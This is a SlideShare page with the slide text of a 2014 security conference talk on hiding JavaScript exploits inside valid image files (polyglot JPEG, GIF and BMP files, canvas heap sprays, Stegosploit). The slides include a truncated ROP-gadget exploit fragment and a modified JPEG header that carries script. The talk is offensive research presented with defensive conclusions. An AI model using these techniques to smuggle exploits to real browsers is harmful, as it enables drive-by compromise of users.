SlideShare a Scribd company logo

Hacking with Pictures - Hack.LU 2014

Saumil Shah
Saumil Shah

This document discusses hiding malicious payloads in images and other file formats. It describes how JavaScript code can be embedded and executed from within JPEG, GIF and BMP image files using techniques like modified file headers. It also explains how the HTML5 canvas element can be used for heap sprays to facilitate exploitation in modern browsers with stricter encoding rules. The document concludes that these image-based attack techniques pose challenges for forensic analysis and defense.

SoftwareEngineeringTechnology
1 of 29
Hacking with Pictures net-square Saumil Shah Hack.LU 2014
Saumil Shah CEO, Net-Square net-square Introduction @therealsaumil saumilshah hacker, trainer, speaker, author - educating, entertaining and exasperating audiences since 1999
net-square #who am i CEO Net-Square Reverse Engineering Exploit Writing Penetration Testing Offensive Security Attack Defense Conference Speaker Conference Trainer Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi .... ... <insert buzzwordy appsec jargon here>
net-square Avoiding Radar JS Obfuscation Broken File Formats OLE Embedding Javascript/ Actionscript Spreading the payload
net-square Hiding In Plain Sight
G r e e t i n g s P r o f e s s o r F a l k e n net-square
net-square I'm an evil Javascript I'm an innocent image
net-square function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(une scape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax _esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744; addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ec x_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be 0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_ eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000 ;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_ 24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addr essof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""! <CANVAS>
net-square Avoid the EVIL eval() var a = eval(str); a = (new Function(str))(); Hat tip: Dr. Mario Heiderich @0x6D6172696F
Theory Becomes Practice - 2014 net-square Hiding In Plain Sight
IMAJS net-square I IZ JAVASCRIPT!
Cross Container Scripting - XCS net-square <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>
net-square IMAJS – The Concept • "Polyglot files" – term coined by Ange Albertini @corkami • IMAJS is targeted towards browsers. • It is a perfectly valid image... • ...and a perfectly valid Javascript!
IMAJS-GIF Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes -
IMAJS-BMP Browser Support Height Width Browser/Viewer Image net-square Renders? Javascript Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes -
net-square All new IMAJS-JPG! • JPG is more powerful than other formats for hiding stuff. • Thanks to EXIF data! • JPG+JS • JPG+HTML • ...and JPG+JS+HTML! Hat tip: Michael Zalewski @lcamtuf
Start marker length Start marker length net-square The Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... "J F I F 0" next section... Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... next section... "J F I F 0" whole lot of extra space!
FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker comment! net-square The Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Javascript goes here next section... Start marker length next section... "J F I F 0" whole lot of extra space!
net-square
CANVASHTML5 for Exploit Dev • jscript9.dll introduced many changes. – No %u0000 in strings. – No 0x00000000 in strings. • Kills conventional Heap Sprays. • <CANVAS> to the rescue! • IE9 and above "support" HTML5. • <!DOCTYPE html> net-square
net-square CANVAS for Exploit Dev • Heap Sprays through Pixel Arrays! • No character restrictions. – All pixels treated equally! • And a bonus... ALPHA CHANNELS.
net-square Stegosploit!
MS14-035 CInput Use-After-Free IMAJS stego PWN! net-square
< PAYLOADS GO net-square back in time
I'M IN UR BASE GET /lolcat.png 200 OK net-square Attack Timeline JS Exploit code encoded in PNG. EVIL ....KILLING UR DOODZ GET /decoder.jpg 200 OK GET /lolcat.png 304 Not Modified Decoder script references PNG from cache. SAFE MAY 2014 OCT 2014
net-square Conclusions - Offensive • Lot of possibilities! • Weird containers, weird encoding, weird obfuscation. • Image attacks emerging "in the wild". • Not limited to just browsers.
net-square Conclusions - Defensive • DFIR nightmare. – how far back does your window of inspection go? • Can't rely on extensions, file headers, MIME types or magic numbers. • Wake up call to browser-wallahs.
net-square Greets and props • Michael Zalewski @lcamtuf • Ange Albertini @corkami • @zer0mem • Mario Heiderich @0x6D6172696F • The fantastic crew of HACK.LU!
net-square Saumil Shah saumil@net-square.com @therealsaumil saumilshah

Recommended

2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?
Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
Saumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
Saumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
Saumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
Saumil Shah
 
15 years through Infosec
15 years through Infosec15 years through Infosec
15 years through Infosec
Saumil Shah
 

Recommended

2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?
Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
Saumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
Saumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
Saumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
Saumil Shah
 
15 years through Infosec
15 years through Infosec15 years through Infosec
15 years through Infosec
Saumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
Saumil Shah
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
Nathan Smith
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
Mo Jangda
 
CSS3 3D Workshop
CSS3 3D WorkshopCSS3 3D Workshop
CSS3 3D WorkshopChristopher Schmitt
 
Css3 101
Css3 101Css3 101
Css3 101
Ignacio Coloma
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON
 
Web Presentations, deck.js and Extensions
Web Presentations, deck.js and ExtensionsWeb Presentations, deck.js and Extensions
Web Presentations, deck.js and Extensions
remiemonet
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover[heweb11] CSS3 Makeover
[heweb11] CSS3 MakeoverChristopher Schmitt
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesPrestoCentre
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Abusing JavaScript for fun and profit
Abusing JavaScript for fun and profitAbusing JavaScript for fun and profit
Abusing JavaScript for fun and profit
Myles Eftos
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
Patrick Chanezon
 
Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!
Rye Corradini
 
Flash 101
Flash 101Flash 101
Flash 101
Stanley Fok
 
[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop
Christopher Schmitt
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Saumil Shah
 
Minimalism in Web Development
Minimalism in Web DevelopmentMinimalism in Web Development
Minimalism in Web Development
Jamie Matthews
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin Howlett
FITC
 
The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Saumil Shah
 

More Related Content

Similar to Hacking with Pictures - Hack.LU 2014

Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
Saumil Shah
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
Nathan Smith
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
Mo Jangda
 
Css3 101
Css3 101Css3 101
Css3 101
Ignacio Coloma
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON
 
Web Presentations, deck.js and Extensions
Web Presentations, deck.js and ExtensionsWeb Presentations, deck.js and Extensions
Web Presentations, deck.js and Extensions
remiemonet
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesPrestoCentre
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Abusing JavaScript for fun and profit
Abusing JavaScript for fun and profitAbusing JavaScript for fun and profit
Abusing JavaScript for fun and profit
Myles Eftos
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
Patrick Chanezon
 
Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!
Rye Corradini
 
Flash 101
Flash 101Flash 101
Flash 101
Stanley Fok
 
[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop
Christopher Schmitt
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Saumil Shah
 
Minimalism in Web Development
Minimalism in Web DevelopmentMinimalism in Web Development
Minimalism in Web Development
Jamie Matthews
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin Howlett
FITC
 

Similar to Hacking with Pictures - Hack.LU 2014 (20)

Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
 
CSS3 3D Workshop
CSS3 3D WorkshopCSS3 3D Workshop
CSS3 3D Workshop
 
Css3 101
Css3 101Css3 101
Css3 101
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 
Web Presentations, deck.js and Extensions
Web Presentations, deck.js and ExtensionsWeb Presentations, deck.js and Extensions
Web Presentations, deck.js and Extensions
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and Processes
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Abusing JavaScript for fun and profit
Abusing JavaScript for fun and profitAbusing JavaScript for fun and profit
Abusing JavaScript for fun and profit
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?
 
Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!Flash Is Dead, Long Live Flash!
Flash Is Dead, Long Live Flash!
 
Flash 101
Flash 101Flash 101
Flash 101
 
[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop[Worskhop Summits] CSS3 Workshop
[Worskhop Summits] CSS3 Workshop
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Minimalism in Web Development
Minimalism in Web DevelopmentMinimalism in Web Development
Minimalism in Web Development
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin Howlett
 

More from Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Saumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Saumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
Saumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
Saumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
Saumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Saumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
Saumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
Saumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
Saumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
Saumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
Saumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
Saumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
Saumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
Saumil Shah
 

More from Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Recently uploaded

Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Natan Silnitsky
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Mind IT Systems
 
First Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User EndpointsFirst Steps with Globus Compute Multi-User Endpoints
First Steps with Globus Compute Multi-User Endpoints
Globus
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus
 
Using IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New ZealandUsing IESVE for Room Loads Analysis - Australia & New Zealand
Using IESVE for Room Loads Analysis - Australia & New Zealand
IES VE
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
Juraj Vysvader
 
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...
Shahin Sheidaei
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
Google
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
Tendenci - The Open Source AMS (Association Management Software)
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
Donna Lenk
 
Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
e20449
 
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume MontevideoVitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke
 
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfEnhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Jay Das
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
Philip Schwarz
 
Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024Cracking the code review at SpringIO 2024
Cracking the code review at SpringIO 2024
Paco van Beckhoven
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
Max Andersen
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Globus
 

Recently uploaded (20)

Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
